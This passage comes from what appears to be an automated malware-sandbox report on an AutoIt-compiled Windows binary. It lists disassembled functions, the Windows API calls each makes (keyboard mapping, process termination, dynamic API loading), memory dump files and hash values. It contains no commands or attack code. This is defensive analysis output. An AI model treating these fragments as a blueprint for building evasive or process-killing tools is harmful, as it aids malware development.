                                                                                                                                                                              • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0051E9F2
                                                                                                                                                                              • LineTo.GDI32(00000000,00000003,?), ref: 0051EA06
                                                                                                                                                                              • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0051EA14
                                                                                                                                                                              • LineTo.GDI32(00000000,00000000,?), ref: 0051EA24
                                                                                                                                                                              • EndPath.GDI32(00000000), ref: 0051EA34
                                                                                                                                                                              • StrokePath.GDI32(00000000), ref: 0051EA44
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 43455801-0
                                                                                                                                                                              • Opcode ID: d2593965ad0bf725c7f0d93b00a092b1bda49bf17d41e4cd17d2ffcfc71d2507
                                                                                                                                                                              • Instruction ID: 643d328a20b7ec3427f02f8ae0288b23a10ba5844ff61633ec2c23deef71cbc5
                                                                                                                                                                              • Opcode Fuzzy Hash: d2593965ad0bf725c7f0d93b00a092b1bda49bf17d41e4cd17d2ffcfc71d2507
                                                                                                                                                                              • Instruction Fuzzy Hash: C711FA76000149BFEB059F94EC88E9A7FBDEB14354F048011FE0945160D7719D99EBA0
                                                                                                                                                                              Function 004EEF91 Relevance: 9.0, APIs: 6, Instructions: 48COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetDC.USER32(00000000), ref: 004EEFB6
                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,00000058), ref: 004EEFC7
                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004EEFCE
                                                                                                                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 004EEFD6
                                                                                                                                                                              • MulDiv.KERNEL32(000009EC,?,00000000), ref: 004EEFED
                                                                                                                                                                              • MulDiv.KERNEL32(000009EC,?,?), ref: 004EEFFF
                                                                                                                                                                                • Part of subcall function 004EA83B: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,004EA79D,00000000,00000000,?,004EAB73), ref: 004EB2CA
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CapsDevice$ExceptionRaiseRelease
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 603618608-0
                                                                                                                                                                              • Opcode ID: 4481edb820f0e669826e43e9f96b20f4a0e4fbc5a0d29324cf7fedd427e6b3a4
                                                                                                                                                                              • Instruction ID: 60e54d41d131b86f2eb7ef45a516b6905322ce6bbbdaa560f3ce4554bb406440
                                                                                                                                                                              • Opcode Fuzzy Hash: 4481edb820f0e669826e43e9f96b20f4a0e4fbc5a0d29324cf7fedd427e6b3a4
                                                                                                                                                                              • Instruction Fuzzy Hash: 1901A775A00345BFEB109BA69C49B5EBFB8EB48751F004066FE08AB380D6709C04DF61
                                                                                                                                                                              Function 004D87D7 Relevance: 9.0, APIs: 6, Instructions: 45threadCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • __init_pointers.LIBCMT ref: 004D87D7
                                                                                                                                                                                • Part of subcall function 004D1E5A: __initp_misc_winsig.LIBCMT ref: 004D1E7E
                                                                                                                                                                                • Part of subcall function 004D1E5A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 004D8BE1
                                                                                                                                                                                • Part of subcall function 004D1E5A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 004D8BF5
                                                                                                                                                                                • Part of subcall function 004D1E5A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 004D8C08
                                                                                                                                                                                • Part of subcall function 004D1E5A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 004D8C1B
                                                                                                                                                                                • Part of subcall function 004D1E5A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 004D8C2E
                                                                                                                                                                                • Part of subcall function 004D1E5A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 004D8C41
                                                                                                                                                                                • Part of subcall function 004D1E5A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 004D8C54
                                                                                                                                                                                • Part of subcall function 004D1E5A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 004D8C67
                                                                                                                                                                                • Part of subcall function 004D1E5A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 004D8C7A
                                                                                                                                                                                • Part of subcall function 004D1E5A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 004D8C8D
                                                                                                                                                                                • Part of subcall function 004D1E5A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 004D8CA0
                                                                                                                                                                                • Part of subcall function 004D1E5A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 004D8CB3
                                                                                                                                                                                • Part of subcall function 004D1E5A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 004D8CC6
                                                                                                                                                                                • Part of subcall function 004D1E5A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 004D8CD9
                                                                                                                                                                                • Part of subcall function 004D1E5A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 004D8CEC
                                                                                                                                                                                • Part of subcall function 004D1E5A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 004D8CFF
                                                                                                                                                                              • __mtinitlocks.LIBCMT ref: 004D87DC
                                                                                                                                                                                • Part of subcall function 004D8AB3: InitializeCriticalSectionAndSpinCount.KERNEL32(0056AC68,00000FA0,?,?,004D87E1,004D6AFA,005667D8,00000014), ref: 004D8AD1
                                                                                                                                                                              • __mtterm.LIBCMT ref: 004D87E5
                                                                                                                                                                                • Part of subcall function 004D884D: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,004D87EA,004D6AFA,005667D8,00000014), ref: 004D89CF
                                                                                                                                                                                • Part of subcall function 004D884D: _free.LIBCMT ref: 004D89D6
                                                                                                                                                                                • Part of subcall function 004D884D: DeleteCriticalSection.KERNEL32(0056AC68,?,?,004D87EA,004D6AFA,005667D8,00000014), ref: 004D89F8
                                                                                                                                                                              • __calloc_crt.LIBCMT ref: 004D880A
                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 004D8833
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2942034483-0
                                                                                                                                                                              • Opcode ID: 52a13addb989c9d652697c4577f992fb30d8c08faf5b13dcbfdb7f8d74e1024e
                                                                                                                                                                              • Instruction ID: 47d3f3caf5185a32e243b615c5a570ff0fd4230a1330d7313abbb475acc47f66
                                                                                                                                                                              • Opcode Fuzzy Hash: 52a13addb989c9d652697c4577f992fb30d8c08faf5b13dcbfdb7f8d74e1024e
                                                                                                                                                                              • Instruction Fuzzy Hash: FBF090321197115AE664773E7C27A7B26D18F01778B600A2FF460D63E2FF588841556C
                                                                                                                                                                              Function 004FA3D2 Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1423608774-0
                                                                                                                                                                              • Opcode ID: cc3c6f4330e36a12422ea5860b5c39d37db96bc74a80d7b447c7a0fe57bc644a
                                                                                                                                                                              • Instruction ID: e5af3f3d1eccd9252beb3514e50087bb7a147719f5f28b53d674b444643fd806
                                                                                                                                                                              • Opcode Fuzzy Hash: cc3c6f4330e36a12422ea5860b5c39d37db96bc74a80d7b447c7a0fe57bc644a
                                                                                                                                                                              • Instruction Fuzzy Hash: 3F01F9761012159BD7152B54FC48DFBB776FF59301700052AFA0792260CB74AC14DB61
                                                                                                                                                                              Function 004B1867 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • MapVirtualKeyW.USER32(0000005B,00000000), ref: 004B1898
                                                                                                                                                                              • MapVirtualKeyW.USER32(00000010,00000000), ref: 004B18A0
                                                                                                                                                                              • MapVirtualKeyW.USER32(000000A0,00000000), ref: 004B18AB
                                                                                                                                                                              • MapVirtualKeyW.USER32(000000A1,00000000), ref: 004B18B6
                                                                                                                                                                              • MapVirtualKeyW.USER32(00000011,00000000), ref: 004B18BE
                                                                                                                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 004B18C6
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Virtual
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 4278518827-0
                                                                                                                                                                              • Opcode ID: 37449b365679fb0926d64a34477de70dd44fc7e06fe03c2ce4daff86b50149f8
                                                                                                                                                                              • Instruction ID: dab4e6bba6ad073db6e0bc42772693b029317f766cc0b456d81076a8fd9c5155
                                                                                                                                                                              • Opcode Fuzzy Hash: 37449b365679fb0926d64a34477de70dd44fc7e06fe03c2ce4daff86b50149f8
                                                                                                                                                                              • Instruction Fuzzy Hash: 09016CB0901B597DE3008F6A8C85B52FFB8FF15354F04411B915C47A41C7F5A864CBE5
                                                                                                                                                                              Function 004F84F4 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 004F8504
                                                                                                                                                                              • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 004F851A
                                                                                                                                                                              • GetWindowThreadProcessId.USER32(?,?), ref: 004F8529
                                                                                                                                                                              • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 004F8538
                                                                                                                                                                              • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 004F8542
                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 004F8549
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 839392675-0
                                                                                                                                                                              • Opcode ID: 070704dd32d6ba8fb764eb252cfeba4192b03965df8cfbe03078d2f69277066f
                                                                                                                                                                              • Instruction ID: 29225a68037304532811a78286e30ed20094f5348ed589a5a37894d160535df9
                                                                                                                                                                              • Opcode Fuzzy Hash: 070704dd32d6ba8fb764eb252cfeba4192b03965df8cfbe03078d2f69277066f
                                                                                                                                                                              • Instruction Fuzzy Hash: DFF0BE32200158BBE7201B62AC0EEEF7E7CDFE6B11F000018FA01D1250EBA06A09E6B4
                                                                                                                                                                              Function 004FA31D Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • InterlockedExchange.KERNEL32(?,?), ref: 004FA330
                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,005266D3,?,?,?,?,?,004BE681), ref: 004FA341
                                                                                                                                                                              • TerminateThread.KERNEL32(?,000001F6,?,?,?,005266D3,?,?,?,?,?,004BE681), ref: 004FA34E
                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,005266D3,?,?,?,?,?,004BE681), ref: 004FA35B
                                                                                                                                                                                • Part of subcall function 004F9CCE: CloseHandle.KERNEL32(?,?,004FA368,?,?,?,005266D3,?,?,?,?,?,004BE681), ref: 004F9CD8
                                                                                                                                                                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 004FA36E
                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?,?,?,?,005266D3,?,?,?,?,?,004BE681), ref: 004FA375
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3495660284-0
                                                                                                                                                                              • Opcode ID: b3fa0926ba233c8f6cbdfb06915a4bfc87635ccb0f2e19dc67f1af1da76d21cb
                                                                                                                                                                              • Instruction ID: 2413207ee8637f8336f16a36bee479fd485180b67c327739f2c98a5271fdeaf3
                                                                                                                                                                              • Opcode Fuzzy Hash: b3fa0926ba233c8f6cbdfb06915a4bfc87635ccb0f2e19dc67f1af1da76d21cb
                                                                                                                                                                              • Instruction Fuzzy Hash: 5BF08976145215ABD3112B64FD4CDEBB77BFF55301B000521FA03912A1CB755815EB71
                                                                                                                                                                              Function 004BC320 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 259fileCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • _memmove.LIBCMT ref: 004BC419
                                                                                                                                                                              • ReadFile.KERNEL32(?,?,00010000,?,00000000,?,?,00000000,?,004F6653,?,?,00000000), ref: 004BC495
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: FileRead_memmove
                                                                                                                                                                              • String ID: SfO
                                                                                                                                                                              • API String ID: 1325644223-1149229531
                                                                                                                                                                              • Opcode ID: 5b5687501a2888efb348438e2b654d2c5750cb3e139482f8aaff5fd220a6e014
                                                                                                                                                                              • Instruction ID: f13fd6abbf2022f4faf713f41a20b1db4ebce1c94d5b51575a03521906de8a94
                                                                                                                                                                              • Opcode Fuzzy Hash: 5b5687501a2888efb348438e2b654d2c5750cb3e139482f8aaff5fd220a6e014
                                                                                                                                                                              • Instruction Fuzzy Hash: 47A1CE70A04619EBDB00CF59D8C0BAAFBB0FF05300F14C59AE8659B381D739D965DBA5
                                                                                                                                                                              Function 004CD7C7 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 250COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004D010A: std::exception::exception.LIBCMT ref: 004D013E
                                                                                                                                                                                • Part of subcall function 004D010A: __CxxThrowException@8.LIBCMT ref: 004D0153
                                                                                                                                                                                • Part of subcall function 004BCAEE: _memmove.LIBCMT ref: 004BCB2F
                                                                                                                                                                                • Part of subcall function 004BBBD9: _memmove.LIBCMT ref: 004BBC33
                                                                                                                                                                              • __swprintf.LIBCMT ref: 004CD98F
                                                                                                                                                                              Strings
                                                                                                                                                                              • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 004CD832
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                                                                                                                              • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                                                                                                              • API String ID: 1943609520-557222456
                                                                                                                                                                              • Opcode ID: a06d29337f42527cd996f64226139874db8bd7688559668abc56ead078b517fb
                                                                                                                                                                              • Instruction ID: e107f787fe5b47c558d8005ff6e03de02e0fa0af6a2107b762cb30b3f504bc67
                                                                                                                                                                              • Opcode Fuzzy Hash: a06d29337f42527cd996f64226139874db8bd7688559668abc56ead078b517fb
                                                                                                                                                                              • Instruction Fuzzy Hash: BF919E75508211AFC754EF25D881DAEBBB4FF85704F00092EF496972A1EB38ED05CB6A
                                                                                                                                                                              Function 0050B482 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 229COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 0050B4A8
                                                                                                                                                                              • CharUpperBuffW.USER32(?,?), ref: 0050B5B7
                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 0050B73A
                                                                                                                                                                                • Part of subcall function 004FA6F6: VariantInit.OLEAUT32(00000000), ref: 004FA736
                                                                                                                                                                                • Part of subcall function 004FA6F6: VariantCopy.OLEAUT32(?,?), ref: 004FA73F
                                                                                                                                                                                • Part of subcall function 004FA6F6: VariantClear.OLEAUT32(?), ref: 004FA74B
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                                                                                                              • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                                                                              • API String ID: 4237274167-1221869570
                                                                                                                                                                              • Opcode ID: 6ec6ca6ed6555fafa526bfacaa6e86a9a3e14b79fb55b74c3f4d559155d6e7c9
                                                                                                                                                                              • Instruction ID: 44f2ed44509efe4cec79acdf4137cab55e9d2451f82f8675e6fe2cce65e39033
                                                                                                                                                                              • Opcode Fuzzy Hash: 6ec6ca6ed6555fafa526bfacaa6e86a9a3e14b79fb55b74c3f4d559155d6e7c9
                                                                                                                                                                              • Instruction Fuzzy Hash: EA9159746043019FCB10DF25C484A5ABBF4BF89704F14496EF88A9B391EB35E945CB62
                                                                                                                                                                              Function 004F5D65 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 180windowCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004B3BCF: _wcscpy.LIBCMT ref: 004B3BF2
                                                                                                                                                                              • _memset.LIBCMT ref: 004F5E56
                                                                                                                                                                              • GetMenuItemInfoW.USER32(?), ref: 004F5E85
                                                                                                                                                                              • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 004F5F31
                                                                                                                                                                              • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 004F5F5B
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                                                                                                                              • String ID: 0
                                                                                                                                                                              • API String ID: 4152858687-4108050209
                                                                                                                                                                              • Opcode ID: dc38e17d4d49adda95557d1475437d19c0a8fd8752075223db88710f7cdc680e
                                                                                                                                                                              • Instruction ID: 6fff779fb20fdde316156a9e73501f57fea48bdd1aa141f9aa4e063f1eb6c07b
                                                                                                                                                                              • Opcode Fuzzy Hash: dc38e17d4d49adda95557d1475437d19c0a8fd8752075223db88710f7cdc680e
                                                                                                                                                                              • Instruction Fuzzy Hash: 8F510331518B099BD3149B28D8446BBB7E4EF85314F08062FFB95D32D1DB78CD0587AA
                                                                                                                                                                              Function 004F1050 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 004F10B8
                                                                                                                                                                              • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 004F10EE
                                                                                                                                                                              • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 004F10FF
